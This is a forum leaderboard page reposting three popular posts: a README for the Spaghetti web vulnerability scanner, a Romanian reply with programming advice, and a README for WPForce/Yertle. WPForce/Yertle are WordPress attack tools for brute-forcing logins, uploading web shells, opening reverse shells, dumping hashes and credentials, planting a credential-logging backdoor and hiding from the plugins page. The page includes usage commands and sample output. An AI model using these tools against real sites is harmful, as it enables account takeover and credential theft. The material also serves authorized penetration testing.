Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/16/17 in all areas

  1. Description Spaghetti is a web application security scanner tool. It is designed to find various default and insecure files, configurations and misconfigurations. Spaghetti is built on python2.7 and can run on any platform which has a Python environment. Installation $ git clone https://github.com/m4ll0k/Spaghetti.git $ cd Spaghetti $ pip install -r requirements.txt $ python spaghetti.py --help Features Fingerprints - Server - Web Frameworks (CakePHP,CherryPy,Django,...) - Web Application Firewall (Waf) (Cloudflare,AWS,Barracuda,...) - Content Management System (CMS) (Drupal,Joomla,Wordpress,Magento) - Operating System (Linux,Unix,Windows,...) - Language (PHP,Ruby,Python,ASP,...) Example: python spaghetti.py --url target.com --scan 0 --random-agent --verbose Discovery: Apache Apache (mod_userdir) Apache (mod_status) Apache multiviews Apache xss Broken Auth./Session Management Admin Panel Backdoors Backup Directory Backup File Common Directory Common File Log File Disclosure Emails IP Injection HTML SQL LDAP XPath XSS RFI PHP Code Other Allow Methods HTML Object Multiple Index Robots Paths Cookie Security Vulns ShellShock Struts-Shock Example: python spaghetti.py --url target.com --scan 1 --random-agent --verbose Download Spagetti-master.zip Source
    2 points
  2. Cand vine vorba de aprecierea cunostiintelor unui absolvent de facultate probabil fiecare avem un standard. Un limbaj nu se invata in o luna sau un an ci intr-un timp definit de fiecare in functie de cat de decis este. Daca stii doar bazele programarii nu cred ca esti pregatit sa fii pus in fata unor probleme reale dar poti fi angajat de diferite firme, mici de regula, care gandesc pe termen lung. Nu te astepta sa ti se spuna ce sa inveti pentru ca in mare parte trebuie sa stii tot ce se poate despre un limbaj. Vorba multa saracia omului, ia si invata: - http://en.cppreference.com/w/ - https://msdn.microsoft.com/en-us/library/3bstk3k5.aspx
    1 point
  3. About: WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules. For more information, visit the blog post here: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/ Features: Brute Force via API, not login form bypassing some forms of protection Can automatically upload an interactive shell Can be used to spawn a full featured reverse shell Dumps WordPress password hashes Can backdoor authentication function for plaintext password collection Inject BeEF hook into all pages Pivot to meterpreter if needed Install: Yertle requires the requests libary to run. http://docs.python-requests.org/en/master/user/install/ Usage: python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com" ,-~~-.___. __ __ ____ _____ / | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___ ( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \. \_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/ ==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___| / \-'~; || | / __/~| ...||__/|-" Brute Force Attack Tool for Wordpress =( _____||________| ~n00py~ Username List: usr.txt (3) Password List: pass.txt (21) URL: http://www[website].com -------------------------- [xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN -------------------------- -------------------------- [xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials! -------------------------- 100% Percent Complete All correct pairs: {'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'} -h, --help show this help message and exit -i INPUT, --input INPUT Input file name -w WORDLIST, --wordlist WORDLIST Wordlist file name -u URL, --url URL URL of target -v, --verbose Verbose output. Show the attemps as they happen. -t THREADS, --threads THREADS Determines the number of threads to be used, default is 10 -a AGENT, --agent AGENT Determines the user-agent -d, --debug This option is used for determining issues with the script. python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i _..---.--. __ __ _ _ .'\ __|/O.__) \ \ / /__ _ __| |_| | ___ /__.' _/ .-'_\ \ V / _ \ '__| __| |/ _ \. (____.'.-_\____) | | __/ | | |_| | __/ (_/ _)__(_ \_)\_ |_|\___|_| \__|_|\___| (_..)--(.._)'--' ~n00py~ Post-exploitation Module for Wordpress Backdoor uploaded! Upload Directory: ebwhbas os-shell> -h, --help show this help message and exit -i, --interactive Interactive command shell -r, --reverse Reverse Shell -t TARGET, --target TARGET URL of target -u USERNAME, --username USERNAME Admin username -p PASSWORD, --password PASSWORD Admin password -li IP, --ip IP Listener IP -lp PORT, --port PORT Listener Port -v, --verbose Verbose output. -e EXISTING, --existing EXISTING Skips uploading a shell, and connects to existing shell Yertle currently contains these modules: Core Commands ============= Command Description ------- ----------- ? Help menu beef Injects a BeEF hook into website dbcreds Prints the database credentials exit Terminate the session hashdump Dumps all WordPress password hashes help Help menu keylogger Patches WordPress core to log plaintext credentials keylog Displays keylog file meterpreter Executes a PHP meterpreter stager to connect to metasploit quit Terminate the session shell Sends a TCP reverse shell to a netcat listener stealth Hides Yertle from the plugins page Download WPForce-master.zip Source: https://github.com/n00py/WPForce
    1 point
×
×
  • Create New...